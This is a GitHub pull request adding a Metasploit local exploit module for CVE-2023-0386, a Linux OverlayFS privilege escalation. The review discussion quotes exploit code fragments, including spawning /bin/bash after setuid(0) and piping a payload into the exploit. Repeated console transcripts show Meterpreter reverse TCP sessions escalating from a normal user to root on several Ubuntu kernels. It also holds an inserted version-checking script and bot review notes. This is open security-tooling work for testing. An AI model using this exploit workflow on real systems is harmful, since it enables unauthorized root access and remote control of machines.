
Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386 #19441

Merged
merged 34 commits into from
Sep 26, 2024

Conversation

Takahiro-Yoko
Contributor

@Takahiro-Yoko Takahiro-Yoko commented Sep 5, 2024

close #18766

Vulnerable Application

This exploit targets the Linux kernel bug in OverlayFS.

A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities
was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount.
This uid mapping bug allows a local user to escalate their privileges on the system.

The vulnerability affects:

* Linux kernel from (including) 5.11 up to (excluding) 5.15.91 and from (including) 5.16 up to (excluding) 6.1.9

This module was successfully tested on:

* Ubuntu kernel version 5.13.0-1021-oem on x64/amd64
* Ubuntu kernel version 6.0.0-060000-generic on x64/amd64
* Ubuntu kernel version 6.0.19-060019-generic on x64/amd64
* Ubuntu kernel version 6.1.0-060100-generic on x64/amd64

Install

  1. Install Ubuntu version 22.04 LTS
  2. (Optional) Change kernel version:

       sudo apt update
       sudo apt install -y linux-image-5.13.0-1021-oem linux-headers-5.13.0-1021-oem
       reboot

  3. Install the required libraries:

       sudo apt update
       sudo apt install -y gcc cmake fuse libfuse-dev libcap-dev

Verification Steps

  1. Set up an Ubuntu target
  2. Create a meterpreter or shell payload and upload it to the Ubuntu target
  3. Set up a handler for the payload
  4. Launch the payload as a regular user on the Ubuntu target and connect to the handler
  5. Do: use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
  6. Do: run session=<session> lhost=<lhost>
  7. You should get root
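Added example, not code from the PR or from the Metasploit module: a stand-alone Ruby checker that maps a kernel release string onto the affected ranges quoted in the description above, the same kind of version gate the transcripts show the module's check reporting as "Linux kernel version found". The range table is taken from the PR text; the function names and the /proc read are my own choices.

```ruby
# Added example (not part of the PR or the Metasploit module): classify a
# kernel release string against the CVE-2023-0386 affected ranges quoted in
# the PR description.

# Affected ranges as [inclusive_start, exclusive_end], straight from the PR text:
#   5.11 <= v < 5.15.91  and  5.16 <= v < 6.1.9
AFFECTED_RANGES = [
  [[5, 11, 0], [5, 15, 91]],
  [[5, 16, 0], [6, 1, 9]]
].freeze

# Parse "5.13.0-1021-oem" or "6.1.0-060100-generic" into [major, minor, patch].
# Everything after the dotted version (build number, flavour) is ignored.
# Returns nil when the string does not start with a dotted version.
def parse_kernel_release(release)
  m = release.to_s.match(/\A(\d+)\.(\d+)(?:\.(\d+))?/)
  return nil unless m
  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# True when version lies in [lo, hi) under lexicographic (Array#<=>) ordering,
# so 5.15.91 itself is already outside the first range.
def in_range?(version, lo, hi)
  (version <=> lo) >= 0 && (version <=> hi) < 0
end

# Returns :affected, :not_affected, or :unknown (unparseable input).
def cve_2023_0386_status(release)
  version = parse_kernel_release(release)
  return :unknown if version.nil?
  AFFECTED_RANGES.any? { |lo, hi| in_range?(version, lo, hi) } ? :affected : :not_affected
end

# Read the running kernel's release from /proc when available (Linux only);
# callers can also pass any release string, e.g. from inventory data.
def running_kernel_release
  File.read('/proc/sys/kernel/osrelease').strip
rescue SystemCallError
  nil
end

if __FILE__ == $PROGRAM_NAME
  rel = ARGV.first || running_kernel_release
  puts "#{rel.inspect}: #{cve_2023_0386_status(rel)}"
end
```

A version-only check cannot see distribution backports, so treat :affected as a prompt to confirm against the distro's kernel package changelog rather than as proof.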

@bwatters-r7 bwatters-r7 self-assigned this Sep 5, 2024
if live_compile? && command_exists?('xxd')
vprint_status('Live compiling exploit on system...')
upload_and_compile("#{exploit_dir}/shell", exploit_source('CVE-2023-0386', 'getshell.c'))
cmd_exec("cd #{exploit_dir} && xxd -i shell > shell.xxd")
Contributor

For Meterpreter sessions, after the cd command is executed the working directory will revert to the original directory, whereas in a shell session there will be a state change and the subsequent commands will be executed from the exploit_dir.

To better support Meterpreter sessions, could you just pass the relative directory in to all commands instead of running the cd?

Contributor Author

Thank you for your comment!

I intend to use the cd command just for the xxd command.

When using the xxd command, we need the -n option to set the variable name used in the C include output (-i). It seems older xxd does not have the -n option.

[screenshot: xxd]

Without the -n option, passing a relative path (a full path in this case, though) to xxd makes the variable name something like the one below (maybe / and . are converted to _?).

[screenshot: xxd without -n]

Handling this could cause some trouble if not done correctly, so I temporarily change directory and run the xxd command to specify the file name without a relative path. Is it acceptable?

Contributor Author

Now I've updated a lot, and no longer need the cd command. cd97b08
Thank you!

register_file_for_cleanup(payload_path)

# Launch exploit
timeout = 30
Contributor

Should this maybe be user configurable?

Contributor Author

Thank you! See dc81711.

Contributor

@bwatters-r7 bwatters-r7 left a comment

Thank you for the module! You may want to check out the overlayfs module I wrote a few years ago, as a lot of the Ruby code will be the same, and I think it might be worthwhile to take the same approach of launching the payload directly from within the exploit code: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

return -1;
}

system("/bin/bash");
Contributor

Could we instead call the binary payload directly here?

Contributor Author

Thank you!
I've tested directly calling the payload using cd97b08 and 692531b (the latter needs setuid and setgid set in the C code).
It seems directly calling the payload takes some time (about 1 min) to really open the Meterpreter session after the "Meterpreter session opened" message.

This one (not directly calling the payload) is much faster (about a few sec): 8366252 (needs setuid and setgid set in the C code).

Contributor

I think adding the setuid and setgid in the C code is a better path: fewer compiles, and worth a little longer wait, but that's just my opinion.

cmd_exec("echo '#{payload_path} & exit' | #{exploit_dir}/cve-2023-0386", nil, timeout)
end

def get_exploit(exploit_dir)
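Review bot: the launch on the cmd_exec line works only if the exploit reaches its system("/bin/bash") call and that root shell reads the piped `'#{payload_path} & exit'` from stdin; if the exploit exits earlier, the piped command is never executed, yet cmd_exec still returns normally and nothing in this block inspects its output or exit status, so the module proceeds as though the payload had started. Checking the exploit's output (or a sentinel it prints on success) before moving on would surface that failure, and execing the payload from the C code itself, as suggested elsewhere in this review, removes the dependency on the interactive shell altogether.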
Contributor

We should move this to the metasploit-framework/data/external/source directory in a separate file.

Contributor Author

Thank you! I've moved the C code: cd97b08


#include "shell.xxd"

#define DIR_BASE "#{exploit_dir}"
Contributor

@bwatters-r7 bwatters-r7 Sep 5, 2024

EDIT: I now understand why this all looks familiar; I wrote a module for a different overlayfs exploit. I passed the exploit dir and the payload in as a parameter. You can see my source here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/cve_2021_3493_overlayfs.rb

Contributor Author

Thank you! I've changed it to pass the exploit directory and the payload in as parameters. cd97b08

upload_and_compile("#{exploit_dir}/shell", exploit_source('CVE-2023-0386', 'getshell.c'))
cmd_exec("cd #{exploit_dir} && xxd -i shell > shell.xxd")
write_file("#{exploit_dir}/cve-2023-0386.c", strip_comments(get_exploit("#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}")))
cmd_exec("gcc -o #{exploit_dir}/cve-2023-0386 #{exploit_dir}/cve-2023-0386.c -D_FILE_OFFSET_BITS=64 -static -lfuse -ldl -pthread")
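Review bot: the return value of the gcc cmd_exec on the last line is discarded, so a failed compile (for example a target without a static libfuse, which `-static -lfuse` requires) is never detected before the module goes on to use #{exploit_dir}/cve-2023-0386. Either capture the output and fail with a clear message, or use upload_and_compile with the same flags, as the first line of this block already does for getshell.c, so both compiles go through one code path.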
Contributor

Is there a reason you're using upload_and_compile above, but manually using gcc here?

Contributor Author

I misunderstood upload_and_compile's second argument to be a file path. cd97b08



int main(int argc, char const *argv[]) {
if (setuid(0) < 0) {
Contributor

You're using setuid and setgid here, but also in the payload?
Since the set commands are supported in the binary payloads, I don't think this is needed unless we're supporting ARCH_CMD payloads, and I don't see you using them here?

Contributor

EDIT: I don't think you need this; I think we can directly call the binary payload from within the exploit code itself.

Contributor Author

Thank you!
cd97b08 does not need setuid and setgid.
It seems 692531b and 8366252 do need setuid and setgid, despite them being set in the payload.

cmd_exec("chmod +x #{exploit_dir}/cve-2023-0386")
else
vprint_status('Dropping pre-compiled exploit on system...')
upload_and_chmodx("#{exploit_dir}/cve-2023-0386", exploit_data('CVE-2023-0386', 'cve-2023-0386'))
Contributor

How does this work if we need to change the exploit_dir value?

Contributor Author

@Takahiro-Yoko Takahiro-Yoko Sep 6, 2024

Thank you! I've added a directory existence check and cleanup (920ef70, 1cc562c). Correct?

Contributor Author

Should I use exploit_path? 9e832eb

end

# Upload exploit executable
exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
Contributor

Why create a directory for the exploit, instead of simply putting it into #{base_dir}?

Contributor

While not strictly necessary, this code pattern was introduced in local exploit modules to keep all artifacts (such as temp files from compiling on-system) within one directory which can be deleted upon completion.

https://github.com/rapid7/metasploit-framework/pull/19441/files#diff-582239976447427dfe518f2db829db0f32f85069b220a831ef7c408b06957d34R153

Given this module performs a few rm -rf calls, I'd certainly feel safer keeping exploitation contained.

Contributor Author

Thank you!

> I'd certainly feel safer keeping exploitation contained.

I agree.

@Takahiro-Yoko
Contributor Author

Thank you for reviewing!
Now I've confirmed this module is successfully working on:

* Ubuntu kernel version 5.13.0-1021-oem on x64/amd64
* Ubuntu kernel version 6.0.0-060000-generic on x64/amd64
* Ubuntu kernel version 6.0.19-060019-generic on x64/amd64
* Ubuntu kernel version 6.1.0-060100-generic on x64/amd64

Contributor

@bwatters-r7 bwatters-r7 left a comment

Amazing work! One last thought on trying to get out of the need to have the shell binary. If you make a call to setuid and setgid in the exploit before calling the payload, you don't need to have that shell binary to do it.

@Takahiro-Yoko
Contributor Author

Thanks! Applied your suggestions, updated the binary and retested.

Ubuntu 20.04 (Linux 5.13.0-1021-oem)
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:57442) at 2024-09-24 19:40:26 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.4i2PvqV7/.JgQxGflwzA' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.4i2PvqV7
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:57444) at 2024-09-24 19:40:51 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 2

[*] 192.168.56.102 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.idEAVu/.Qm2Z9Ggt' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.idEAVu
[*] Meterpreter session 3 opened (192.168.56.1:4444 -> 192.168.56.102:57446) at 2024-09-24 19:42:07 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 3

[*] 192.168.56.102 - Meterpreter session 3 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.13.0
[*] Writing '/tmp/.hhpwHLY/.fZtCMcNJiz' (18800 bytes) ...
[*] Writing '/tmp/.hhpwHLY/.6Jkge71' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.hhpwHLY
[*] Meterpreter session 4 opened (192.168.56.1:4444 -> 192.168.56.102:57448) at 2024-09-24 19:43:36 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.102
OS           : Ubuntu 20.04 (Linux 5.13.0-1021-oem)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.0.0-060000-generic)
msf6 exploit(multi/handler) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 5 opened (192.168.56.1:4444 -> 192.168.56.10:60584) at 2024-09-24 19:47:19 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.xfFQr/.OhOfAiYT8' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.xfFQr
[*] Meterpreter session 6 opened (192.168.56.1:4444 -> 192.168.56.10:55300) at 2024-09-24 19:47:50 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 6

[*] 192.168.56.10 - Meterpreter session 6 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.BEkixc8SY/.5EjeVIs1cx' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.BEkixc8SY
[*] Meterpreter session 7 opened (192.168.56.1:4444 -> 192.168.56.10:55184) at 2024-09-24 19:49:12 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 7

[*] 192.168.56.10 - Meterpreter session 7 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=5 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.0
[*] Writing '/tmp/.zGU0Y3lC/.n4L8gml' (18800 bytes) ...
[*] Writing '/tmp/.zGU0Y3lC/.ErJ3mItMl' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.zGU0Y3lC
[*] Meterpreter session 8 opened (192.168.56.1:4444 -> 192.168.56.10:50666) at 2024-09-24 19:50:36 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.0-060000-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.0.19-060019-generic)
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 9 opened (192.168.56.1:4444 -> 192.168.56.10:56070) at 2024-09-24 19:56:44 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 9...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.naRRsi/.C6JPN9tsKm' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.naRRsi
[*] Meterpreter session 10 opened (192.168.56.1:4444 -> 192.168.56.10:38102) at 2024-09-24 19:57:18 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 10

[*] 192.168.56.10 - Meterpreter session 10 closed.  Reason: Died
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.ePXBvbuk/.GybuIQO145' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.ePXBvbuk
[*] Meterpreter session 11 opened (192.168.56.1:4444 -> 192.168.56.10:50576) at 2024-09-24 19:58:57 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 11

[*] 192.168.56.10 - Meterpreter session 11 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=9 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.0.19
[*] Writing '/tmp/.XWfn1lnlQR/.mdA0b' (18800 bytes) ...
[*] Writing '/tmp/.XWfn1lnlQR/.nT6yoYgkq' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.XWfn1lnlQR
[*] Meterpreter session 12 opened (192.168.56.1:4444 -> 192.168.56.10:34516) at 2024-09-24 20:00:14 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.0.19-060019-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Ubuntu 22.04 (Linux 6.1.0-060100-generic)
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 13 opened (192.168.56.1:4444 -> 192.168.56.10:47084) at 2024-09-24 20:06:15 +0900

meterpreter > getuid
Server username: ubu
meterpreter > background 
[*] Backgrounding session 13...
msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=Auto

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.qFqXa42h/.kfSh6H9lx' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.qFqXa42h
[*] Meterpreter session 14 opened (192.168.56.1:4444 -> 192.168.56.10:54724) at 2024-09-24 20:06:49 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 14

[*] 192.168.56.10 - Meterpreter session 14 closed.  Reason: Died
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=True

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.2KTojM/.TuFvNKR9YE' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.2KTojM
[*] Meterpreter session 15 opened (192.168.56.1:4444 -> 192.168.56.10:59642) at 2024-09-24 20:08:06 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit -y
[*] Shutting down session: 15

[*] 192.168.56.10 - Meterpreter session 15 closed.  Reason: User exit
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=13 lhost=192.168.56.1 COMPILE=False

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Failed to open file: /proc/sys/kernel/unprivileged_userns_clone: core_channel_open: Operation failed: 1
[+] The target appears to be vulnerable. Linux kernel version found: 6.1.0
[*] Writing '/tmp/.3Xjpmq/.ZuVPhPKCh' (18800 bytes) ...
[*] Writing '/tmp/.3Xjpmq/.keQCG' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.3Xjpmq
[*] Meterpreter session 16 opened (192.168.56.1:4444 -> 192.168.56.10:43118) at 2024-09-24 20:09:30 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.56.10
OS           : Ubuntu 22.04 (Linux 6.1.0-060100-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@bwatters-r7
Contributor

msf6 payload(linux/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4568 -> 10.5.132.129:44206) at 2024-09-24 09:31:21 -0500

msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > show options

Module options (exploit/linux/local/cve_2023_0386_overlayfs_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION  1                yes       The session to run this module on
   TIMEOUT  60               yes       Timeout for exploit (seconds)


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile False 
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.GnaFdtmy9/.6y3LCB' (18040 bytes) ...
[*] Writing '/tmp/.GnaFdtmy9/.155hTk1' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.GnaFdtmy9
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.129:50664) at 2024-09-24 09:33:48 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.129 - Meterpreter session 2 closed.  Reason: User exit
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile True 
compile => True
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Linux kernel version found: 5.15.0
[*] Writing '/tmp/.SRDnO7/.lfNiPVLYt' (1068952 bytes) ...
[*] Launching exploit...
[+] Deleted /tmp/.SRDnO7
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.129:50666) at 2024-09-24 09:35:37 -0500

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

@bwatters-r7
Contributor

I pushed an updated binary because I have trust issues and it is easier for me to recompile than reverse-engineer the binary file.

@bwatters-r7
Contributor

msf6 payload(linux/x64/meterpreter_reverse_tcp) > [*] Meterpreter session 1 opened (10.5.135.201:4568 -> 10.5.132.129:60362) at 2024-09-26 12:52:16 -0500

msf6 payload(linux/x64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : 10.5.132.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter_reverse_tcp) > md5sum data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf
[*] exec: md5sum data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf

f7903df30ec3d98a0adad16edfc333d8  data/exploits/CVE-2023-0386/cve_2023_0386.x64.elf
msf6 payload(linux/x64/meterpreter_reverse_tcp) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > show options

Module options (exploit/linux/local/cve_2023_0386_overlayfs_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on
   TIMEOUT  60               yes       Timeout for exploit (seconds)


Payload options (linux/x64/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set lport 6789
lport => 6789
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > set compile False 
compile => False
msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run

